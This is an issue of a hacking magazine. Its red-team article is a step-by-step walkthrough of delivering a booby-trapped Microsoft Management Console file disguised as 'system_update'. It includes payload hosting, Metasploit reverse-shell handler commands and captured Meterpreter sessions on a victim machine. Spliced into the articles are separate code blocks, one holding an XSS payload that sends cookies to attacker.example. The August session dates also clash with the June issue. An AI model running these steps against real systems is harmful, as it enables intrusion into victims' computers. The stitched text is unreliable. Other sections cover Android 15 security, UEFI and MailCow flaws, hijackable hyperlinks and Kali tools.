Hackercool Magazine
Simplifying Cyber Security since 2016
June 2024, Edition 7 Issue 6

Cover: Learn how Black Hat Hackers hack. Red Team Hacking: Exploiting Microsoft Management Console to gain access to Windows systems. Mobile Security: Latest security and privacy features in Android 15. Vulnerability for Beginners: UEFI firmware of Phoenix Technologies and MailCow Mail Server. What's New: Kali Linux 2024.2.

Copyright © 2016 Hackercool CyberSecurity (OPC) Pvt Ltd. All rights reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed "Attention: Permissions Coordinator," at the address below.

Any references to historical events, real people, or real places are used fictitiously. Names, characters, and places are products of the author's imagination.

Hackercool Cybersecurity (OPC) Pvt Ltd.
Banjara Hills, Hyderabad 50003. Telangana, India.
Website: www.hackercoolmagazine.com

Information provided in this Magazine is strictly for educational purposes only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.

"Then you will know the truth and the truth will set you free." John 8:32

Editor's Note, Edition 7 Issue 6
We are once again skipping the editor's note for the same reason already obvious to you.
"In this attack, the criminals start a new MSBuild process with a twist: they specify a working directory located on a remote SMB server." - Researchers of Bitdefender on the recent Chinese hacking campaign

INSIDE
See what our Hackercool Magazine's June 2024 Issue has in store for you.
1. Red Team Hacking: Exploiting Microsoft Management Console to gain access.
2. Mobile Security: Latest security and privacy features of Android 15.
3. Vulnerability for Beginners: UEFI firmware of Phoenix Technologies.
4. Vulnerability for Beginners: MailCow Mail Server.
5. Online Security: We analyzed the entire web and found a security threat lurking in plain sight.
6. What's New: Kali Linux 2024.2.
7. Cybersecurity: Major IT outage brings businesses around the world to a standstill. Experts explain what happened and why.
Downloads
Other Useful Resources

Exploiting Microsoft Management Console to gain access
RED TEAM HACKING

Researchers at Elastic Security Labs have identified a novel attack technique, used by hackers in the wild, that abuses Microsoft Management Console in Windows to evade defenses and gain access. Elastic Security Labs have codenamed this technique "GrimResource". In this month's issue, our readers will learn about this attack technique in detail.

What is Microsoft Management Console?
Microsoft Management Console (MMC) is a component present by default in Microsoft Windows that provides system administrators an interface for configuring and monitoring systems. It was first introduced in 1998 with the Option Pack for Windows NT 4.0 and later came pre-installed with Windows 2000 and its successors.

[Figure: an empty MMC console window ("Console Root": "There are no items to show in this view").]

It is usually used for administration of Windows systems. Examples of popular MMC consoles are "Computer Management" and "Group Policy Editor".
[Figure: the Computer Management console (System Tools: Task Scheduler, Event Viewer, Shared Folders, Local Users and Groups, Performance, Device Manager; Storage: Disk Management; Services and Applications) and the Local Group Policy Editor (Computer Configuration and User Configuration, each with Software Settings, Windows Settings and Administrative Templates).]

What are Snap-ins?
Snap-ins are the tools of Microsoft Management Console. Popular examples of snap-ins are Event Viewer, Device Manager and so on. If MMC is the toolbox, snap-ins are the tools inside it.

Why are hackers exploiting MMC?
Ever since Microsoft started blocking Office macros from the internet by default, hackers have been searching for novel techniques to gain access and deliver their malware or payloads. The GrimResource technique is one such technique. It has the same advantages for Red Teams too.

Now that you have understood what Microsoft Management Console is and what snap-ins are, let's see how to create a malicious snap-in to exploit MMC. Black hat hackers around the world have created a Management Saved Console (.msc) file that, when clicked upon by the victim, exploits a cross-site scripting (XSS) vulnerability present in the apds.dll library to execute malicious JavaScript code in the context of MMC. An .msc file is an XML document that mmc.exe loads when it is double-clicked, so the victim only has to open what looks like a console file. However, while red teaming, we can create a malicious .msc file that does not need to exploit any vulnerability. Let's see how.

On a Windows system, open Microsoft Management Console (run the command mmc from the Start menu). Open the File menu and click on "Add/Remove Snap-in".
[Figure: the MMC File menu (New, Open, Save, Save As, Add/Remove Snap-in (Ctrl+M), Options) over an empty Console Root.]

This will open a new window. In the new window that opens, select "Link to Web Address" as shown below.

[Figure: the "Add or Remove Snap-ins" dialog. "You can select snap-ins for this console from those available on your computer and configure the selected set of snap-ins. For extensible snap-ins, you can configure which extensions are enabled." The "Available snap-ins" list includes Folder, Group Policy Object Editor, IP Security Monitor, IP Security Policy Management, Link to Web Address, Local Users and Groups, Performance Monitor, Print Management, Resultant Set of Policy, Security Configuration and Analysis and Security Templates; "Selected snap-ins" shows Console Root. Description: "The Link to Web Address snap-in enables you to add an MMC node with a Web page in the results view."]

This will open another new window. Enter the URL where you will be hosting your payload. In real-world attacks, hackers have mostly used Cobalt Strike Beacon and Brute Ratel payloads while using this attack technique. As you know, we always replace it with a msfvenom payload.

[Figure: the "Link to Web Address" wizard. "Welcome to the Link to Web Address Wizard. The Link to Web Address snap-in consists of an MMC node with a Web page in the results view. Type the path or URL for the site you want to display, or click Browse."]
[Figure: the wizard's "Path or URL:" field filled with the payload URL, followed by the page "Friendly name for the Link to Web Address snap-in:" set to system_update.]

Here's the .msc file I created.

[Figure: "Console1 - [Console Root]" showing a single node named system_update.]

Now, we need to send this file to the target user. This requires some social engineering, of course. Go to the File menu, select "Save As" and save the file to your desired location.
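Before sending the file on, it is worth seeing what a defender finds in it. The following is an added example, not from the article, from Elastic or from any project mentioned here: a small Python triage script that parses an .msc file (it is plain XML) and flags the indicators the GrimResource write-up is built on, namely an apds.dll reference, a javascript: or vbscript: URI, inline script markup, and any remote URL such as the one a Link to Web Address node stores. The sample .msc embedded in the script is constructed for the demo and only loosely imitates the real file layout; the root element name and the StringTable structure are assumptions.

```python
"""Triage a Management Saved Console (.msc) file for GrimResource-style content.

Added example, not the magazine's, Elastic's or MSC_Dropper's code. Walks every
element, attribute and text node of the XML and reports indicators a defender
would want to see before letting an .msc through.
"""
import re
import sys
import xml.etree.ElementTree as ET

# Indicator name -> pattern. A bare URL is only "suspicious" on its own because
# legitimate consoles can link to intranet pages; the other three mean code runs.
INDICATORS = {
    "apds_dll": re.compile(r"apds\.dll", re.I),
    "script_uri": re.compile(r"\b(javascript|vbscript):", re.I),
    "inline_script": re.compile(r"<\s*script\b", re.I),
    "remote_url": re.compile(r"""\b(https?|file|res)://[^\s"'<>]+""", re.I),
}


def iter_strings(root):
    """Yield (location, text) for every attribute value and text node."""
    for elem in root.iter():
        for name, value in elem.attrib.items():
            yield f"{elem.tag}@{name}", value
        if elem.text and elem.text.strip():
            yield elem.tag, elem.text.strip()


def triage_msc(xml_data):
    """Return a sorted list of unique (indicator, location, matched_text) findings."""
    root = ET.fromstring(xml_data)
    findings = set()
    for loc, text in iter_strings(root):
        for name, rx in INDICATORS.items():
            for m in rx.finditer(text):
                findings.add((name, loc, m.group(0)))
    return sorted(findings)


def verdict(findings):
    """'malicious' if a code-execution indicator is present, 'suspicious' for a
    remote URL only, otherwise 'clean'."""
    names = {f[0] for f in findings}
    if names & {"apds_dll", "script_uri", "inline_script"}:
        return "malicious"
    if "remote_url" in names:
        return "suspicious"
    return "clean"


# Constructed sample: a console whose string table carries a payload URL like the
# one typed into the Link to Web Address wizard, plus an apds.dll redirect string
# of the kind GrimResource uses. Layout is an assumption, not the real schema.
SAMPLE_MSC = b"""<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables>
    <StringTable>
      <Strings>
        <String ID="1" Refs="1">Console Root</String>
        <String ID="2" Refs="1">system_update</String>
        <String ID="3" Refs="1">http://192.168.249.148:8000/met_x64_http_148_80.exe</String>
        <String ID="4" Refs="1">res://apds.dll/redirect.html?target=javascript:alert(1)</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_MSC
    found = triage_msc(data)
    for name, loc, text in found:
        print(f"{name:14} {loc:10} {text}")
    print("verdict:", verdict(found))
```

Run it as `python triage_msc.py suspicious.msc`; without an argument it triages the embedded sample. The location column tells you which element carried the string, which is usually enough to spot a StringTable entry that has no business holding a URL.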
[Figure: the "Save As" dialog. File name: system update.msc; Save as type: Microsoft Management Console Files (*.msc).]

Before you send the file to the victim system, make sure the listener is ready on the attacker's system. A plain Python web server hosts the payload executable and a Metasploit multi/handler waits for the reverse connection; both run on the Kali attacker machine, 192.168.249.148:

    (kali㉿kali)-[~/Desktop]
    $ python3 -m http.server
    Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_http
    payload => windows/x64/meterpreter/reverse_http
    msf6 exploit(multi/handler) > set lhost 192.168.249.148
    lhost => 192.168.249.148
    msf6 exploit(multi/handler) > set lport 80
    lport => 80
    msf6 exploit(multi/handler) > run
    [*] Started HTTP reverse handler on http://192.168.249.148:80

Now we are ready to send the .msc file to the target. Once the target opens it and the payload runs, the handler sees the staging requests (the UUID warning only means no Metasploit database is connected):

    [!] http://192.168.249.148:80 handling request from 192.168.249.165; (UUID: vryadftd) Without a database connected that payload UUID tracking will not work!
    [*] http://192.168.249.148:80 handling request from 192.168.249.165; (UUID: vryadftd) Staging x64 payload (201820 bytes) ...
    [*] Meterpreter session 1 opened (192.168.249.148:80 -> 192.168.249.165:53888) at 2024-08-13 02:26:18 -0400

    meterpreter > sysinfo
    Computer        : CUSTOMER-CARE-1
    OS              : Windows 10 (10.0 Build 19045).
    Architecture    : x64
    Meterpreter     : x64/windows
    meterpreter > getuid

There is also a script available on GitHub (download link given in our Downloads section) that creates the .msc dropper file for us. Let's clone the script.

    $ git clone https://github.com/ZERODETECTION/MSC_Dropper
    Cloning into 'MSC_Dropper'...
    remote: Enumerating objects: 31, done.
    remote: Counting objects: 100% (31/31), done.
    remote: Compressing objects: 100% (27/27), done.
    remote: Total 31 (delta 9), reused 0 (delta 0), pack-reused 0 (from 0)
    Receiving objects: 100% (31/31), 15.19 KiB | 324.00 KiB/s, done.
    Resolving deltas: 100% (9/9), done.
    $ cd MSC_Dropper
    $ ls
    detection_rule_2.yar  msc_dropper.py  README.md  ...

There are two templates, "template1.msc" and "template2.msc", that can be used to generate our MSC payloads. The syntax to use the script is shown below.
    Usage: python msc_dropper.py ...

Set up the handler exactly as before (payload windows/x64/meterpreter/reverse_http, lhost 192.168.249.148, lport 80) and run it:

    msf6 exploit(multi/handler) > run
    [*] Started HTTP reverse handler on http://192.168.249.148:80

Once the target user clicks on the "update.msc" file, our payload gets downloaded from the web server:

    (kali㉿kali)-[~/Desktop]
    $ python3 -m http.server
    Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
    192.168.249.165 - - [14/Aug/2024 01:41:41] "GET /met_x64_http_148_80.exe HTTP/1.1" 200 -

Then it gets executed, giving us a meterpreter session on the target system.

    [!] http://192.168.249.148:80 handling request from 192.168.249.165; (UUID: bnzrsnqb) Without a database connected that payload UUID tracking will not work!
    [*] http://192.168.249.148:80 handling request from 192.168.249.165; (UUID: bnzrsnqb) Staging x64 payload (201820 bytes) ...
    [*] Meterpreter session 1 opened (192.168.249.148:80 -> 192.168.249.165:63955) at 2024-08-14 01:41:43 -0400

    meterpreter > sysinfo
    Computer        : CUSTOMER-CARE-1
    OS              : Windows 10 (10.0 Build 19045).
    Architecture    : x64
    Meterpreter     : x64/windows
    meterpreter >

Latest security and privacy features of Android 15
MOBILE SECURITY

Google has unveiled new privacy and security features coming to Android 15. Let's take a look at the innovations in the upcoming operating system update.

New Security and Privacy Features in Android 15
At the recent I/O 2024 developer conference in California, Google presented the second beta version of its Android 15 operating system, codenamed Vanilla Ice Cream. The company also gave us a closer look at the new security and privacy features coming with the update. While the final release of Android 15 is still a few months away, slated for the third quarter of 2024, we can already explore the new security features this operating system has in store for Android users.

AI-Powered Smartphone Theft Protection
The most significant security upgrade is a suite of new features designed to protect against smartphone theft and the user data contained within. Google plans to make some of these features available not only in Android 15 but also for older versions of the operating system (starting with Android 10) through service updates.
1. Factory Reset Protection: To prevent thieves from wiping a stolen phone and quickly selling it, Android 15 will let you set up a lock that prevents resetting the device without the owner's password.
2. Private Space for Apps: Some apps, like banking ones or instant messengers, can be hidden and protected with an additional PIN code, preventing thieves from accessing sensitive data.
3. Critical Settings Protection: Disabling Find My Device or changing the screen lock timeout will require authentication using a PIN, password, or biometrics. Accessing critical settings like changing the PIN, disabling anti-theft, or using passkeys will also require biometric authentication.

[Figure: the Private space setup screen.]

New Anti-Theft Features in Android
Several anti-theft features will be available not only in Android 15 but also in versions 10 and above:
1. AI-Powered, Accelerometer-Based Automatic Screen Locking: The screen will automatically lock if the system detects movements characteristic of someone snatching the phone and quickly running or driving away.
2. Automatic Locking on Internet Disconnection: The smartphone will automatically lock if a thief tries to keep it disconnected from the internet for a long time. This can also be set for other situations, such as after a significant number of unsuccessful authentication attempts.

[Figure: Theft protection settings. "Motion lock automatically locks down your screen to protect your data when it detects a theft motion." A new remote locking feature tied to the owner's Google account is also shown.]

Protection of Personal Data During Screen Sharing and Recording

[Figure: a Messages conversation showing a "Create a new TriBank account" passkey prompt: "Passkeys are easy and safe. You just need to use your device's fingerprint, face recognition, or PIN to create and sign in with a passkey."]
[Figure continued: "Sign up with a password instead".]

Android 15 also focuses on protecting user data from scams such as fake tech support:
1. Selective Screen Sharing: Screen sharing will, by default, only share the specific app the user is interacting with, not the system interface. Full-screen sharing will still be possible if needed.
2. Notification Content Hiding: The system will only display notification content if the app developer has provided a special "public version" for it. Otherwise, the content will be hidden.
3. OTP and Sensitive Data Protection: Android 15 will automatically detect and hide windows that contain one-time passwords or sensitive data during screen sharing or recording.

[Figure: sharer view versus receiver view of a one-time password screen, "Protect one-time passwords".]

Android 15 introduces Enhanced Confirmation Mode to improve upon the Restricted Settings feature:
1. Trusted Installers: Instead of checking the app installation method, the mechanism will refer to an XML file built into the operating system containing a list of trusted installers. Apps downloaded from elsewhere will be automatically blocked from accessing notifications and Accessibility services.

[Figure: "Restricted setting. For your security, this setting is currently unavailable."]

Protecting One-Time Codes in Notifications
In addition to the improved Restricted Settings, Android 15 will feature additional protection against apps intercepting one-time passwords when accessing notifications from other apps. The operating system will analyze the notification and remove the one-time password from its contents before passing it to the app.
[Figure: the Security & privacy settings screen. "Your data may be at risk. See recommendation." Mobile network security: "Connected to unencrypted network. Calls, messages, and data are currently more vulnerable while using your Default SIM. When your connection is encrypted again, you'll get another notification." App security: Play Protect scanning is on. Device unlock: Screen lock, Face & Fingerprint Unlock. Account security.]

Warnings About Insecure Cellular Networks
Android 15 will introduce new features to protect against attackers using malicious cellular base stations:
1. Warnings About Unencrypted Connections: The operating system will warn users if their cellular connection is unencrypted.
2. Location Tracking Alerts: Users will be notified if a malicious base station or specialized tracking device is recording their location using their device ID (IMSI or IMEI).

New App Protection Feature

[Figure: a "Close apps to continue" dialog and a Play Integrity API documentation excerpt: "App access risk. Check whether other apps are running that could be capturing the screen or controlling the device (CAPTURING / CONTROLLING). Available in beta."]

Android 15 enhances the Play Integrity API, allowing developers to identify fraudulent activity within their apps:
1. Screen Recording and Overlay Detection: Developers can check if another app is recording the screen, displaying windows on top of their app's interface, or controlling the device on behalf of the user.
2. Google Play Protect Integration: Developers can check if Google Play Protect is running on the device and if any known malware has been detected in the system.

On-Device Google Play Protect
Google Play Protect will now operate directly on user devices, providing "live threat detection" by analyzing app behavior and sending potentially dangerous apps to Google Cloud for review.
Conclusion
While Android 15 brings significant advancements in privacy and security, it's still recommended to use a comprehensive security solution on all your Android devices. These measures complement the new features and provide additional layers of protection. For more detailed information, consider reviewing Kaspersky Security & VPN and setting up your Android privacy and security settings using the Privacy Checker.

UEFI firmware of Phoenix Technologies
VULNERABILITY FOR BEGINNERS

In this month's Vulnerability for Beginners, keeping in line with the latest trend of vulnerabilities being detected in processors and their components, we look at a vulnerability disclosed by researchers of the supply chain security firm Eclypsium, with a reported CVSS rating of 7.5, in UEFI firmware designed by Phoenix Technologies.

Where is this firmware used?
This firmware runs on multiple families of Intel Core desktop and mobile processors.

[Figure: a network gateway, firewall and network switch in front of desktops running a processor with the vulnerable UEFI.]

What is the actual vulnerability?
The vulnerability is a buffer overflow caused by unsafe handling of a variable in the Trusted Platform Module (TPM) configuration code. A Trusted Platform Module is a physical or embedded security technology used to store critical information on PCs to enable platform authentication. TPMs use cryptography for this purpose.

[Figure: a buffer overflow in the Trusted Platform Module (TPM) configuration.]

This vulnerability is named "UEFIcanhazbufferoverflow" and can be exploited to execute malicious code. It is tracked as CVE-2024-0762.

How can this vulnerability be exploited?
If an attacker gains access to a system that is running a processor with the vulnerable UEFI, they can exploit it at runtime to elevate privileges. Note that this is a local, post-access vulnerability: the attacker needs a foothold on the machine first, which is what the next figure shows.
[Figure: exploitation flow. Step 0: The hacker already has low-level persistent access on the target system with the vulnerable UEFI. Step 1: The hacker exploits the UEFI vulnerability at runtime to elevate privileges on the system.]

Impact
A vulnerability of this type is commonly exploited by firmware backdoors like BlackLotus. This gives the attacker ongoing persistence within a device.

MailCow Mail Server
VULNERABILITY FOR BEGINNERS

Recently, two security vulnerabilities were disclosed in the open source mail server called MailCow. MailCow is a Docker-based email server.

Where is it used?
MailCow, like any other mail server, is used inside the network of organizations that prefer to run their own mail server. It is used to send and receive emails.

[Figure: a desktop user, a MailCow server admin user and the vulnerable MailCow mail server behind a network gateway, firewall and network switch.]

What are the vulnerabilities?
Both vulnerabilities affect all versions of MailCow before the update released on April 4, 2024. Let's learn about each of them.
1) CVE-2024-30270: This is a directory traversal vulnerability that could result in the execution of arbitrary commands on the mail server by the attackers.
2) CVE-2024-31204 (CVSS score: 6.8): This is a cross-site scripting vulnerability via the exception handling mechanism when MailCow is not operating in its DEV_MODE.

How can these be exploited?
A threat actor can craft an HTML email containing a CSS image that can trigger execution of an XSS payload.
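The XSS half of that chain, reduced to the pattern it relies on, as an added example that is not MailCow's code (the handler, the request path and the DEV_MODE switch are stand-ins chosen for the demo): an error page that interpolates an exception message carrying attacker-controlled input into HTML without escaping, shown beside a hardened version that stays silent outside developer mode and escapes the message inside it. The attacker path is what a CSS image reference in an HTML mail could make the logged-in admin's browser request.

```python
"""Reflected XSS through an exception handler: vulnerable vs hardened.

Added example, not MailCow's code. Models a generic web app whose error page
echoes the exception text, which contains the request path the attacker chose.
"""
import html


class NotFound(Exception):
    """Raised by the app with the offending input in the message, as many
    frameworks do for a missing route or file."""


def lookup(path):
    """Stand-in application routine (assumption for the demo)."""
    if path not in ("/index.php", "/api/v1/get/status"):
        raise NotFound(f"No handler for {path}")
    return "ok"


def render_error_vulnerable(exc):
    # BUG: the exception text, and with it the attacker's path, is placed
    # verbatim into the response body, so markup inside it is live.
    return f"<html><body><h1>Error</h1><p>{exc}</p></body></html>"


def render_error_hardened(exc, dev_mode=False):
    # Production: never echo the message to the client; log it server-side.
    if not dev_mode:
        return "<html><body><h1>Error</h1><p>An internal error occurred.</p></body></html>"
    # Developer mode: escape before interpolating so the markup is inert.
    return f"<html><body><h1>Error</h1><p>{html.escape(str(exc))}</p></body></html>"


def handle(path, renderer):
    """Dispatch a request path and render any exception with `renderer`."""
    try:
        return lookup(path)
    except NotFound as exc:
        return renderer(exc)


# Constructed attacker input: the URL of a CSS image in an HTML mail could point
# the admin's browser at a path like this on the mail server.
ATTACK_PATH = "/<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def contains_live_script(page):
    """True if the response carries an unescaped <script> tag."""
    return "<script>" in page


if __name__ == "__main__":
    print("vulnerable:", contains_live_script(handle(ATTACK_PATH, render_error_vulnerable)))
    print("hardened  :", contains_live_script(handle(ATTACK_PATH, render_error_hardened)))
    print("dev mode  :", handle(ATTACK_PATH, lambda e: render_error_hardened(e, dev_mode=True)))
```

The fix has two parts on purpose: escaping alone would still leak internal paths and stack details to anyone who can trigger an error, so production mode returns a generic message and the detailed, escaped version only appears when the developer switch is on.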
If an admin user of the MailCow mail server views this email (there is no need to click anything) while being logged in to the admin panel of the email server, the hacker can combine both vulnerabilities to execute malicious code on the admin panel of the server.

Impact
By triggering the XSS payload after exploiting these vulnerabilities, an attacker can hijack a session and perform privileged actions on the mail server. He can even take control of all accounts on a MailCow server, subsequently gaining access to sensitive data belonging to the organization.

[Figure: attack flow. Step 1: The hacker sends an HTML email containing a CSS image that triggers execution of an XSS payload. Step 2: The admin views this email while being logged into the admin panel of the MailCow mail server. Step 3: The hacker combines both vulnerabilities to execute malicious code on the MailCow server.]

We analyzed the entire web and found a security threat lurking in plain sight
ONLINE SECURITY
Kevin Saric, Computer Scientist & Mechatronic Engineer

Our latest research has found that clickable links on websites can often be redirected to malicious destinations. We call these "hijackable hyperlinks" and have found them by the millions across the whole of the web, including on trusted websites.

Our paper, published at the 2024 Web Conference, shows that cybersecurity threats on the web can be exploited at a drastically greater scale than previously thought.

Concerningly, we found these hijackable hyperlinks on the websites of large companies, religious organisations, financial firms and even governments. The hyperlinks on these websites can be hijacked without raising any alarms. Only vigilant, some might say paranoid, users would avoid falling into these traps.

If we were able to find these vulnerabilities across the web, so can others. Here's what you need to know.

What are hijackable hyperlinks?
If you make a typo when entering your bank's web address, you might accidentally end up on a phishing site, one that impersonates, or "spoofs", your bank's website to steal your personal info. If you're in a rush and don't inspect the website closely, you may enter sensitive personal details and pay a steep price for your mistake. This could include identity theft, account compromise or financial loss.

Something even more dangerous happens when programmers mistype web addresses in their code. There's a chance their typo will direct users to an internet domain that has never been purchased.
We call these phantom domains. For example, a programmer making a link to theconversation.com might accidentally link to tehconversation.com (note the misspelling). If the mistyped domain has never been purchased, someone could come along and buy that phantom domain for around A$10, hijacking the inbound traffic. In these cases, the price of programmers' mistakes is paid by the users.

These programmer linking errors don't just risk directing users to phishing or spoofing sites. Hijacked traffic can be directed towards a range of traps, including malicious scripts, misinformation, offensive content, viruses and any other hacks the future will bring.

Over half a million phantom domains
Using high-performance computing clusters, we processed the whole browsable web for these vulnerabilities. At a scale never seen in research, in total we analysed over 10,000 hard drives' worth of data.
Doing so, we found over 572,000 phantom domains. The hijackable hyperlinks directing users to them were found on many trusted websites. In a twist of irony, this even included web-based software designed to enforce privacy legislation on websites.

We investigated what errors caused these vulnerabilities and categorised them. Most were caused by typos in hyperlinks, but we also found another type of programmer-generated vulnerability: placeholder domains.

When programmers develop a website that does not yet have a specific domain, they often enter links to a phantom domain with the expectation the links will be fixed later.

We found this to be common with website design templates, where the aesthetic components of a website are purchased from another programmer rather than developed in-house. When the design template is later installed on a website, the phantom domains are often not updated, making links to them hijackable.
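A crawl for the two error classes just described, typo'd hosts and template placeholder hosts, as an added example that is not the paper's tooling: the script below extracts the host of every absolute link in an HTML document and flags hosts within a small edit distance of one of the site's own domains (using a distance that counts a swapped pair of letters as one edit, so tehconversation.com is one edit from theconversation.com) and hosts on a list of well-known placeholders. It resolves and registers nothing; the HTML, the site's own domain list and the placeholder list are constructed for the demo.

```python
"""Flag hijackable hyperlinks in a page: typo'd hosts and placeholder hosts.

Added example, not the research paper's code. Offline: it only inspects the
markup it is given. OWN_DOMAINS and PLACEHOLDER_HOSTS are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

OWN_DOMAINS = {"theconversation.com"}  # the site's real hosts (assumed)
PLACEHOLDER_HOSTS = {"example.com", "yourdomain.com", "yoursite.com", "domain.com"}
TYPO_DISTANCE = 2  # hosts this close to an own domain are treated as typos


class LinkExtractor(HTMLParser):
    """Collect href/src values from the tags that can pull content off-site."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag in ("a", "link", "script", "img", "iframe"):
            for name, value in attrs:
                if name in ("href", "src") and value:
                    self.links.append(value)


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute or swap
    two adjacent characters, each costing one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def _under(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_host(host):
    """Return 'typo', 'placeholder' or None for a link's hostname."""
    host = host.lower()
    if host.startswith("www."):
        host = host[4:]
    if _under(host, OWN_DOMAINS):
        return None  # links to ourselves are fine
    if _under(host, PLACEHOLDER_HOSTS):
        return "placeholder"
    for own in OWN_DOMAINS:
        if osa_distance(host, own) <= TYPO_DISTANCE:
            return "typo"
    return None


def find_hijackable(html_text):
    """Return [(reason, hostname, url)] for every suspicious absolute link."""
    parser = LinkExtractor()
    parser.feed(html_text)
    findings = []
    for url in parser.links:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue  # relative links cannot point off-site
        reason = classify_host(parts.hostname)
        if reason:
            findings.append((reason, parts.hostname, url))
    return findings


# Constructed page: one good link, two typo'd hosts, one template placeholder,
# one relative link and one unrelated third-party host.
SAMPLE_HTML = """<html><body>
<a href="https://theconversation.com/about">About</a>
<a href="https://tehconversation.com/donate">Donate</a>
<img src="https://www.theconversatoin.com/logo.png">
<script src="https://cdn.example.com/app.js"></script>
<a href="/local/page">Local</a>
<a href="https://github.com/some/repo">Repo</a>
</body></html>"""

if __name__ == "__main__":
    for reason, host, url in find_hijackable(SAMPLE_HTML):
        print(f"{reason:12} {host:28} {url}")
```

In a real crawl you would feed every page of the site through `find_hijackable` and then check each flagged host against WHOIS or DNS; a flagged host that is unregistered is exactly the phantom domain the article describes, and the fix is to correct the link before someone else registers it.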
To determine if hijackable hyperlinks could be exploited in practice, we purchased 51 of the phantom domains they point to and passively observed the inbound traffic. From this, we detected substantial traffic coming from the hijacked links. Compared to similar new domains that lacked hijacked links, 88% of our phantom domains got more traffic, with up to ten times more visitors.

For average web users, awareness is key. Links cannot be trusted. Be vigilant.

For those in charge of companies and their websites, we suggest several technical countermeasures. The simplest solution is for website operators to "crawl" their websites for broken links. Countless free tools are available for doing so. If any broken links are found, fix them before they are hijacked.

We, the Web
British scientist Sir Tim Berners-Lee first proposed the web at CERN in 1989. In his earliest description of it, still widely available on the web as a testament to itself, there is a section titled "non requirements", where security is addressed. This section includes the fateful phrase: "[Data security is] of secondary importance at CERN, where information exchange is still more important."

While this was true of CERN in 1989, the web is now the primary information exchange medium of the modern age. We have come to treat the web as an external component of our own brains. This is evidenced by the popularity of large language models like ChatGPT, which themselves are trained on data from the web.

As our dependence deepens, it might be time to mentally re-categorise web data security from "non requirements" to "important requirements".

This article first appeared in The Conversation.

Kali Linux 2024.2
WHAT'S NEW

Introduction to Kali Linux
Kali Linux is a Linux distribution used among cyber security professionals, ethical hackers, and penetration testers. Kali Linux, developed and maintained by Offensive Security, is a Debian-based distribution and is termed the most widely used because it has the largest collection of tools for performing a variety of information security tasks, from vulnerability assessment and penetration testing to digital forensics and reverse engineering.

What sets Kali Linux apart, however, is that it is oriented to offer a very robust security-testing platform. It comes preloaded with hundreds of tools, so it is the one-stop shop for any professional charged with the duty of securing a network or system.
What makes Kali Linux such an extremely valuable tool is its ability to work in versatile and user-friendly ways, whether you need a full-scale pen test or even a simple security audit. Kali Linux changes continuously with every new release: each release updates its tools, boosts performance, and engages the user much better. Kali Linux 2024.2 is the latest release, and it does not fail in bringing a raft of new features and tools that make it more potent for anyone working in cybersecurity.

Introduction to Kali Linux 2024.2

The latest release, Kali Linux 2024.2, continues this tradition of excellence with new features, tools, and updates that will enhance the user's experience and further amplify the capabilities of this distribution. Kali Linux 2024.2 does come with quite a few key changes that enhance the desktop, and additional tools for penetration testers. The release does not only keep pace with the latest developments in the domain of cybersecurity; it sets the stage for new and veteran users to discover and exploit vulnerabilities efficiently. Featuring new tools that address developing security concerns and desktop enhancements for improving the general user experience, it lets users perform their security assessment projects more efficiently.

"While popular media often depicts computer hackers as loners, the cybercrime ecosystem is highly complex and collaborative. In fact, the hacker economy is so large that the World Economic Forum predicts cybercrime will cost the global economy 10.5 trillion annually by 2025."

New Tools Added

Kali Linux 2024.2 brings quite a few new tools to the table, further extending the possibilities for penetration testers by providing enhanced functionality for many kinds of security assessments. These tools address problems in the cybersecurity domain and will give pentesters what they need to be ahead of threats.
1. AutoRecon

AutoRecon is a multithreaded network reconnaissance tool developed to save a lot of time for penetration testers. This is especially true for CTF situations, such as those encountered during the OSCP, or in real-world engagements. It is a powerful tool for the enumeration of services, conducting comprehensive scanning on a target network and quickly searching for open ports and running services. AutoRecon automates several well-known tools, such as Nmap and gobuster, among others, to gain fine-grained information about a network. Hence, this automation accelerates the very first stage of reconnaissance and guarantees that no service will be skipped, thus delivering an overall view of the target.

"Mobile cyberattacks are on the rise — and they can be just as devastating to SMBs as computer and network hacks. It's crucial to include mobile devices in cybersecurity plans for comprehensive security coverage."

[Screenshot: usage output of autorecon --help. Only fragments survived extraction, among them: [-mp MAX_PORT_SCANS] [-c CONFIG_FILE] [-g GLOBAL_FILE], [--plugins-dir PLUGINS_DIR] [--add-plugins-dir PLUGINS_DIR], [--nmap NMAP | --nmap-append NMAP_APPEND] [--proxychains], [--disable-sanity-checks] [--disable-keyboard-control], [--dirbuster.wordlist VALUE [VALUE ...]] and [--vhost-enum.wordlist VALUE [VALUE ...]].]
2. Coercer

Coercer is a Python script that enables lateral movement within networks where Windows servers are coerced to authenticate to arbitrary machines. The prime purpose behind developing it was to demonstrate possible ways of making a Windows server authenticate, which helps to acquire NTLM hashes or some other form of authentication data (for example, for reuse in privilege escalation). Coercer is very helpful during penetration testing and makes a tester more effective at finding possible vulnerabilities within a network's authentication protocols.

"Hackers' favorite accounts to target include Facebook, Instagram, Spotify and Twitch. They'll use leaked credentials or steal login details via phishing emails."

